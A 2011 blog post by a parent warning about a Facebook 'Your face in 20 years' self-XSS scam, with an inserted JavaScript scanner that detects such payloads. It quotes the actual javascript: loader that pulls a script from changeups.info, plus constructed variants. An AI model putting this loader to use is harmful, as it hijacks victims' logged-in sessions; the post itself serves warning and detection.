Tuesday, May 03, 2011

Facebook Spam: Your Face in 20 Years

This is just a heads-up to you other Facebook users out there. I logged into my Facebook account this afternoon to find out my daughter had been the victim of yet another of the daily Facebook viruses. This one seems to be mostly inane and harmless with the exception that it seems to spam everyone you know via both wall posts and messages. If it has more damaging effects I’ve yet to uncover them.

So I thought I’d take a moment and write about how to tell if a message or wall post you receive seems to be spam.

Message Spam

Here’s the message I got from my daughter today on my Facebook:

[Screenshot: spam message]

On the surface it looks innocent enough. I especially like the “whoops sorry meant to send that to someone else” comment they used to make you think it was a real message intended for another person. I only picked up on it because that’s not the traditional diction my daughter uses when she chats. She’d have said something more like “Did u c this yet? It’s pretty funn. C wat u luk like 20 yrs older” Hey.. imagine that.. +1 point for spammers being too stupid to keep up on the lingo! At least I’m not the only one not in-tune with today’s kids!

Rather than click on the message I clicked on her wall instead. This is what I saw (it’s slightly shrunk down to make it fit on this page, but you get the point). Even my child, as internet-addicted as she is, wouldn’t spend the hour it takes to manually post the exact same message to 90 of her friends’ walls on Facebook.

[Screenshot: spam list]

If you click on any of the links you see the person’s wall and this is the post it makes:

[Screenshot: spam app]

Ok.. this too seems innocent enough.. almost, but I was still slightly bugged by the whole repeated posting thing. As I looked at her friends’ walls I could see where she had most likely been infected, from one of their messages, because over half her friends had the same posting and theirs appeared before hers did, by minutes to hours depending on the person.

Knowing I’ve got enough sense NOT to get infected, I figured I was safe trying to figure out what this link does. When you click on the link it takes you to an official Facebook App page, located at:

http://www.facebook.com/pages/Your-face-in-20-years/121085477971294

(I’ve already reported the app to Facebook as a scam and hopefully it will get removed soon enough.)

This is what the app page looks like.

WARNING: Though the app page itself causes no harm, do NOT follow its instructions or you WILL get infected.
To save you the curiosity I took a screen capture of the app page. This is what you would see there:

[Screenshot: spam page]

Right off the bat you can tell something is wrong here. Don’t EVER EVER EVER copy and paste code from an app into your browser window. No legitimate application on facebook would use that as a way to access itself.

Basically this app tells you to copy that code and paste it into your browser window and then press enter.

If you look closely at the code, to any normal, naïve user it looks harmless. The address is below (DO NOT CLICK OR PASTE IT):

javascript:(a=(b=document).createElement('script')).src='//changeups.info/age/u.php?'+Math.random(),b.body.appendChild(a);void(0)

Basically that’s a command telling your browser to run JavaScript inside the Facebook page you already have open, and that script then loads another script from a site called changeups.info, which with a little digging I found is located and hosted in Switzerland. I’m not exactly sure what the script does, because I don’t want to risk getting infected either, but this is a good example of a spam attack that bypasses your antivirus application. By entering that into your browser you’re basically telling the computer “I WANT to go here and execute this script,” no matter what the script is.

Most likely the script copies cookies from your browser’s memory to get at your facebook password (which you stored moments earlier when you were on the facebook site). Now it has your logon, your password, and 100% access to post on Facebook as you.
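As an added example (not code from the original post), here is a small JavaScript scanner that shows what the pasted line actually does to the browser and flags that class of payload in a message or wall post. The scheme check mirrors the whitespace and case handling browsers apply to text typed into the address bar. The first sample is the exact string quoted above; the other samples and the host cdn.example.invalid are constructed for the example.

```javascript
// Added example for this post, not the author's code. It classifies text the
// way a browser's address bar would: a "javascript:" scheme at the start runs
// the rest as script INSIDE the page that is already open, so anything it
// loads acts with that user's logged-in Facebook session. The functions only
// classify strings; nothing here executes or fetches the payload.

// Browsers strip leading/trailing whitespace and control characters and remove
// tab, newline and carriage return anywhere in typed input before reading the
// scheme, so "  JaVa\nScript:" still runs. Mirror that before checking.
function normaliseUrl(text) {
  return String(text)
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}

// True when the text, entered into an address bar, would execute as script.
function isJavascriptUrl(text) {
  return /^javascript:/i.test(normaliseUrl(text));
}

// Hosts a payload would contact: absolute (http/https) or protocol-relative
// ("//host/...") URLs, the form used in the payload quoted in the post.
function remoteHosts(code) {
  const hosts = new Set();
  const re = /(?:https?:)?\/\/([a-z0-9-]+(?:\.[a-z0-9-]+)+)/gi;
  let m;
  while ((m = re.exec(code)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Tell-tale of a loader: it creates a <script> element and appends it.
function injectsScript(code) {
  return /createElement\s*\(\s*['"]script['"]\s*\)/i.test(code) &&
         /append(?:Child)?\s*\(/i.test(code);
}

// Classify one link or pasted line.
function analyseLink(text) {
  const url = normaliseUrl(text);
  const js = /^javascript:/i.test(url);
  const body = js ? url.slice('javascript:'.length) : '';
  const hosts = js ? remoteHosts(body) : [];
  const inject = js && injectsScript(body);
  let verdict = 'ok';
  if (js && (inject || hosts.length > 0)) verdict = 'self-xss';
  else if (js) verdict = 'suspicious';
  return { isJavascriptUrl: js, injectsScript: inject, remoteHosts: hosts, verdict };
}

// Scan a whole message or wall post: find the first javascript: scheme anywhere
// in it (after the same tab/newline removal) and classify from there.
function scanPost(text) {
  const flat = String(text).replace(/[\t\n\r]/g, '');
  const at = flat.search(/javascript:/i);
  if (at < 0) {
    return { isJavascriptUrl: false, injectsScript: false, remoteHosts: [], verdict: 'ok' };
  }
  return analyseLink(flat.slice(at));
}

const SAMPLES = {
  // The exact line quoted in the post above. Do not paste it into a browser.
  fromPost: "javascript:(a=(b=document).createElement('script')).src='//changeups.info/age/u.php?'+Math.random(),b.body.appendChild(a);void(0)",
  // Constructed variant: mixed case, leading spaces and an embedded newline.
  obfuscated: "  JaVaScRiPt:\n(a=(b=document).createElement('script')).src='https://cdn.example.invalid/x.js';b.body.appendChild(a)",
  // Constructed wall post with a payload buried in chat text.
  post: "Did u c this yet? javascript:void(document.body.appendChild(Object.assign(document.createElement('script'),{src:'//cdn.example.invalid/a.js'}))) lol",
  // The app page URL from the post: an ordinary http link, so the scheme check
  // does not fire. The danger there is what the page tells you to do, not the link.
  benign: "http://www.facebook.com/pages/Your-face-in-20-years/121085477971294",
};

// One row per sample, suitable for logging or a quick table.
function report(samples) {
  return Object.entries(samples).map(([name, text]) => {
    const r = scanPost(text);
    return { name, verdict: r.verdict, hosts: r.remoteHosts.join(',') };
  });
}

for (const row of report(SAMPLES)) {
  console.log(`${row.name.padEnd(11)} ${row.verdict.padEnd(10)} ${row.hosts}`);
}
```

Run it with node. The verdict for the post’s payload is self-xss, with changeups.info as the host it would load from, while the app page URL scores ok because the scheme only fires when it sits at the very start of what goes into the address bar. That is exactly why the instruction to copy, paste and press enter is the tell rather than any particular link. Most current browsers strip or refuse the javascript: scheme when it is pasted into the address bar, which is the direct mitigation for this class of attack; the scanner is still useful for spotting the payload in messages and posts before anyone gets that far.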

In less than an hour tonight, there were hundreds of my daughter’s contacts and friends infected and that was without me having to take the time to actually look in-depth to find out more about the scam.

In short, unless you KNOW it’s a trusted application, always send a message or email to the person who sent you this kind of link to verify they meant to do so. I simply called my daughter tonight and asked her “Did you intentionally waste an hour today posting links to hundreds of people on Facebook?” She said “Uhh.. no. Why?” Well there ya go.. she got hacked.

Knowing my daughter uses her Facebook password as her email password, now some hacker in Switzerland has access to all my daughter’s personal information. Assuming the worst case scenario, I took a look at my daughter’s email account using only the information the hacker would have, and found out all I could in 60 seconds or less. If this were actually used to get at my kid, I would now know the following:

  • Her full name
  • Age
  • Email address and password
  • All her facebook friends.
  • Father and Mother’s names and facebook accounts and email addresses.
  • The name, age, and info of every relative she has on facebook.
  • Her church and what time her youth group meets, and where they meet this week. (so I’d know how to stalk her)
  • That she’s in the high school band, and her band director’s name.
  • What events her band is doing, when, and where. (so I’d know how to stalk her)
  • How to communicate with her on Skype, google talk, facebook, and every other chat program she uses.

I found out all this in under one minute with only the knowledge gained from her Facebook login and password.

So, what’s the lesson parents and kids?

  • Be careful what you click on on social networking sites.
  • Don’t EVER use an app that requires you to copy and paste code at all.
  • Don’t respond or click on messages or wall posts that you REALLY don’t know are safe.
  • Don’t ever have your Facebook and email passwords the same. EVER EVER EVER EVER EVER! (I know I stutter, but I mean that.. EVER!)
  • Don’t assume that because you got it from a trusted source that it’s OK.

I hope the rest of you out there in the web-o-sphere have a great night and that maybe this prevents you from falling victim to the same thing.

2 comments:

  1. Didn't finish reading the whole post yet but I got the same thing. Thanks for posting this. I knew something was not right about it, just had to confirm it.